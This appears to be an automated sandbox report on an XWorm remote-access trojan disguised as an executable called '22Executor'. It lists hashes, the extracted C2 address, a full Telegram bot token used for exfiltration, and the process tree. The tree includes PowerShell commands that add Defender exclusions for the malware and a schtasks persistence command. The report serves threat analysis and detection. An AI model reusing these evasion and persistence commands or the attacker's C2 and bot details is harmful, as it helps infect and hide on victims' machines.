Analysis
- max time kernel: 36s
- max time network: 44s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 30-06-2024 19:13
Static task: static1
Behavioral task behavioral1: sample 22Executor (1).exe, resource win7-20240508-en
Behavioral task behavioral2: sample 22Executor (1).exe, resource win10v2004-20240226-en
General
- Target: 22Executor (1).exe
- Size: 14.3MB
- MD5: 2f6ccdc5a983127eb4619c0131b22f74
- SHA1: ea606124c913238a1cd06ed46cf297467634745a
- SHA256: 404a515445e44719d42c8689968c39b4903d9fb65bab7624cd14a943b7809ae8
- SHA512: 97ebbd6814cc8451ed14f573bcf9d81f025e2a127df71f6632eece8886952edda5ed075a48f88e859a044c6070bfd64035922ff171689df8b3f6428813d1c9a1
- SSDEEP: 1536:efT1xxuiGO+oS2tXFlGXyjXnq7CkHOHmvkKUUgFv2qsFjAk1CortszhXXIX8xe2X:G2HoZXFlAyjrkHOHRFsFcGtsz1ef29d
Malware Config
Extracted: xworm
- tr3.localto.net:44953
- Install_directory: %ProgramData%
- install_file: svchhost.exe
- telegram: https://api.telegram.org/bot6919369290:AAGnnKr1Yo67mV9jYUriuVi-XAno2tdvbq0/sendMessage?chat_id=6340808873
Signatures

Detect Xworm Payload (2 IoCs)
Processes:
- resource: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe, yara_rule: family_xworm
- resource: behavioral2/memory/2436-47-0x0000000000030000-0x000000000004C000-memory.dmp, yara_rule: family_xworm
Command and Scripting Interpreter: PowerShell (1 TTPs, 5 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
- pid 3564 powershell.exe
- pid 4012 powershell.exe
- pid 3356 powershell.exe
- pid 1504 powershell.exe
- pid 2768 powershell.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Processes:
- Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation, by 22Exe.exe
- Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation, by 22Executor (1).exe
Drops startup file (4 IoCs)
Processes:
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe, by 22Executor (1).exe
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe, by 22Executor (1).exe
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk, by 22Exe.exe
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchhost.lnk, by 22Exe.exe
Executes dropped EXE (2 IoCs)
Processes:
- pid 2188 22.exe
- pid 2436 22Exe.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
- Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchhost = "C:\\ProgramData\\svchhost.exe", by 22Exe.exe
Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
- flow 18: ip-api.com
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
Processes:
- pid 3396 WerFault.exe, target pid 2188 22.exe
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes:
- pid 2436 22Exe.exe
Suspicious behavior: EnumeratesProcesses (16 IoCs)
Processes:
- pid 3564 powershell.exe (2 events)
- pid 4012 powershell.exe (3 events)
- pid 3356 powershell.exe (3 events)
- pid 1504 powershell.exe (3 events)
- pid 2768 powershell.exe (3 events)
- pid 2436 22Exe.exe (2 events)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
- Token: SeDebugPrivilege, pid 3564 powershell.exe
- Token: SeDebugPrivilege, pid 2436 22Exe.exe
- Token: SeDebugPrivilege, pid 4012 powershell.exe
- Token: SeDebugPrivilege, pid 3356 powershell.exe
- Token: SeDebugPrivilege, pid 1504 powershell.exe
- Token: SeDebugPrivilege, pid 2768 powershell.exe
- Token: SeDebugPrivilege, pid 2436 22Exe.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
- pid 2436 22Exe.exe
Suspicious use of WriteProcessMemory (17 IoCs)
Processes:
- PID 332 (22Executor (1).exe) wrote to memory of 2188 (22.exe), 3 events
- PID 332 (22Executor (1).exe) wrote to memory of 3564 (powershell.exe), 2 events
- PID 332 (22Executor (1).exe) wrote to memory of 2436 (22Exe.exe), 2 events
- PID 2436 (22Exe.exe) wrote to memory of 4012 (powershell.exe), 2 events
- PID 2436 (22Exe.exe) wrote to memory of 3356 (powershell.exe), 2 events
- PID 2436 (22Exe.exe) wrote to memory of 1504 (powershell.exe), 2 events
- PID 2436 (22Exe.exe) wrote to memory of 2768 (powershell.exe), 2 events
- PID 2436 (22Exe.exe) wrote to memory of 4628 (schtasks.exe), 2 events
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\22Executor (1).exe"
  - Checks computer location settings
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  - Child: C:\Users\Admin\AppData\Local\Temp\22.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\22.exe"
    - Executes dropped EXE
    - Child: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2188 -s 1048
      - Program crash
  - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - Child: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe
    Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe"
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22Exe.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '22Exe.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchhost.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchhost.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - Child: C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchhost" /tr "C:\ProgramData\svchhost.exe"
      - Scheduled Task/Job: Scheduled Task
- C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2188 -ip 2188
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)